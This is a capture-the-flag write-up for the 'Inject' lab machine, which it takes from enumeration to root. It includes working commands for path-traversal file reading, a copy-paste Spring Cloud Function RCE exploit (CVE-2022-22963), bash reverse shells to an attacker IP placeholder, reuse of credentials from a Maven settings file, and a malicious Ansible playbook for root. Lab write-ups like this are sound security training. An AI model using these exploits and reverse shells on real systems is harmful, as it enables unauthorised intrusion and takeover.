💉Inject Write-Up

The write-up covers boot-to-root method with very less explanation

Boot To Root

Enumeration

Lets use Rustscan for initial enumeration

rustscan -n --ulimit 10000 --scan-order "Random" -a inject.htb -- -A -sC

**Output of RustScan
------------------**
PORT     STATE SERVICE     REASON  VERSION
22/tcp   open  ssh         syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 caf10c515a596277f0a80c5c7c8ddaf8 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDKZNtFBY2xMX8oDH/EtIMngGHpVX5fyuJLp9ig7NIC9XooaPtK60FoxOLcRr4iccW/9L2GWpp6kT777UzcKtYoijOCtctNClc6tG1hvohEAyXeNunG7GN+Lftc8eb4C6DooZY7oSeO++PgK5oRi3/tg+FSFSi6UZCsjci1NRj/0ywqzl/ytMzq5YoGfzRzIN3HYdFF8RHoW8qs8vcPsEMsbdsy1aGRbslKA2l1qmejyU9cukyGkFjYZsyVj1hEPn9V/uVafdgzNOvopQlg/yozTzN+LZ2rJO7/CCK3cjchnnPZZfeck85k5sw1G5uVGq38qcusfIfCnZlsn2FZzP2BXo5VEoO2IIRudCgJWTzb8urJ6JAWc1h0r6cUlxGdOvSSQQO6Yz1MhN9omUD9r4A5ag4cbI09c1KOnjzIM8hAWlwUDOKlaohgPtSbnZoGuyyHV/oyZu+/1w4HJWJy6urA43u1PFTonOyMkzJZihWNnkHhqrjeVsHTywFPUmTODb8=
|   256 d51c81c97b076b1cc1b429254b52219f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIUJSpBOORoHb6HHQkePUztvh85c2F5k5zMDp+hjFhD8VRC2uKJni1FLYkxVPc/yY3Km7Sg1GzTyoGUxvy+EIsg=
|   256 db1d8ceb9472b0d3ed44b96c93a7f91d (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICZzUvDL0INOklR7AH+iFw+uX+nkJtcw7V+1AsMO9P7p
8080/tcp open  nagios-nsca syn-ack Nagios NSCA
| http-methods: 
|_  Supported Methods: GET HEAD OPTIONS
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

As we can see there is not much we have in terms of open ports, lets see what’s on the other side of the website that is hosted on the machine.

homepage

From here we have only 2 options, one being Signup and other being Upload method.

While enumerating Signup, we have hit a dead end 😟

dead end

Sub-Directory Enumeration

We are going to use feroxbuster for this job, I am using custom bash functions, so dont worry about the commands that I use in the screenshots.

Here is the command that you can actually use to do the sub-directory enumeration, make sure to replace the wordlist.txt with the one that you want to use

feroxbuster -s "200,204,301,302,307,308,401,405" -t "600" --timeout 15 -u http://inject.htb -w wordlist.txt -e -x php,html,txt,sql,bak,tar,tar.gz,db,zip,sqlite,ticket,docx,json,aspx,jsp,war --auto-tune

ferrox in action

Lets check the upload section

upload section

Try uploading any file, and you will get an error stating that only image files can be uploaded, however if you just change the extension of the file that can allow you to upload any file you want.

You don’t have to manipulate the magic number to bypass the verification system, just upload any file you want, and make sure to provide a .jpg extension.

However if you want to further enumerate the endpoint we can use any sample image file and try understand the path where it is being uploaded.

Lets try that.

uploaded the file

After uploading the file you will get a link, to view your file, click that and you will be taken to a new page.

And now notice the URL parameters that is being used.

check the url

Local File Inclusion

Lets try enumerating for LFI

We can use ffuf for this

ffuf -w seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u http://target.local:8080/show_image\?img\=FUZZ -t 100 -c -fc 500,404

As we can see we have multiple hits

ffuf in action

we can use any one of them, lets try using curl and see what happens

curl http://inject.htb:8080/show_image\?img\=../../../../../../../../../../../../../../../../../../../etc/passwd

We can read the the contents of the /etc/passwd files now.

lfi exploitation

Lets check for the files in the Web root directory which is by default /var/www

/var/www

Hmmm, Looks like we have a Spring Boot Project, here.

The pom.xml file is a dependency list for the project, lets enumerate that

pom.xml

We have multiple dependencies here, lets enumerate the first one

The spring cloud function web 3.2.2 looks very interesting.

A quick google search for the exploit shall lead us to spring4shell exploit. Which has a CVE-2022-22963

spring cloud function web 3.2.2 exploit - Google Search

Exploit PoC

https://github.com/me2nuk/CVE-2022-22963

Using the knowledge from the PoC from github link we can craft out own bash function to make a more interactive exploit:

spring4Shell () {
    if [[ -n "$1" && -n "$2" ]]; then
        curl -X POST  $1/functionRouter -H "spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec('$2')" --data-raw 'data' -v
    else
        usageHelp;
        echo -e "[*] CVE-2022-22963 Spring4Shell"
        echo -e "[*] Simple Remote Code Execution Exploit for Spring Cloud Function"
        echo -e "[!] spring4Shell http://target.com:8080 "whoami '>' /tmp/pwned"\n"
    fi
}

You can just copy and paste this function in your .bashrc or .zshrc or any aliases file that you are using and initialise it, or you can just start a new terminal session.

source ~/.bashrc
OR
source ~/.zshrc
OR
source ~/.bash_aliases

Once done we can start our exploitation phase.

---

Exploitation

To get a shell we need to upload our reverse shell via the upload method we discovered earlier, however we don’t know where it is being uploaded, So to get that information we can simply use curl and make a request to get a file that does not exists.

curl http://inject.htb:8080/show_image\?img\=../../../../../../../../../../../../../../../../../../../var/www/WebApp/xyx

using curl

We have an Information Disclosure here, the error points out where the files are being uploaded

file:/var/www/WebApp/src/main/uploads/../.

lets craft our own reverse shell

echo -e '/bin/bash -i >& /dev/tcp/YOUR_HTB_IP/9999 0>&1' > evil.sh.jpg

And upload this to the server via the upload method

Now start a reverse shell handler in your terminal

nc -lvkp 9999

And then Execute it via the RCE Exploit, before you do that you might want to check if you are getting a ping request via the target or not

# First Setup TCPDump to listen for ping request
sudo tcpdump -i tun0 icmp
# Then execute a ping request from the target machine
spring4Shell http://target.local:8080 "ping -c 1 YOUR_HTB_IP"

open the shell

If all goes well, we can start to execute our reverse shell.

# You can check if the is uploaded or not via the curl command that we used earlier
curl http://target.local:8080/show_image\?img\=../../../../../../var/www/WebApp/src/main/uploads
# If the script got removed from the system you need to upload it again before exploting the RCE
# Once ready start the exploitation
spring4Shell http://target.local:8080 "chmod +x /var/www/WebApp/src/main/uploads/evil.sh.jpg"
spring4Shell http://target.local:8080 "bash -c /var/www/WebApp/src/main/uploads/evil.sh.jpg"

getting the shell

I have 2 separate windows open one to execute RCE and one to get the reverse shell.

# Get a better shell than a tty prompt
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=screen

---

Privilege Escalation

First things first, try to get a better shell, for example as you are “frank” the current user, you can create an authroized_keys file in the /home/frank/.ssh/ folder, if the .ssh folder does not exist create it. And upload your own public key that you can use to authenticate via the SSH.

Once that’s done, we can check the .m2 folder and check for the maven settings file which contains credentials

privesc

Escalate up to the other user “phil”, using the credentials mentioned in the settings.xml file

# Switch User to Phil
su phil
# Get the user flag
cd /home/phil
cat user.txt

So how do we escalate from here, lets use pspy, which you can upload via your own web server

python -m http.server 69 DIRECTORY_WHERE_PSPY_IS_LOCATED/

# Then on the victim machine
wget http://YOUR_HTB_IP:69/pspy
chmod +x pspy
./pspy | tee report.txt

Via pspy we can see that there is a cron job running, which is executing ansible playbook files.

pspy in action

If we can inject our own playbook file we can get a root reverse shell.

We can use this template : https://gist.githubusercontent.com/Reelix/32ccf1baaa3066654a460265fca53960/raw/7c61e2ec5c2261d525f4726e5d0511824ac0e15e/reverse-shell.yml

And edit the file and upload it to the /opt/automation/tasks/evil.yml

# Edit the file as per following, and make sure to provide your own HTB IP, do not copy this comment                                                                             evil.yml                                                                                          
- hosts: localhost
  tasks:
  - name: rev
    shell: bash -c 'bash -i >& /dev/tcp/YOUR_HTB_IP/6969 0>&1'

As you can see I got root access after waiting for some time.

llisten for the call

get the flag

Thank you for reading my post, have a great rest of your day, and good hunting 😎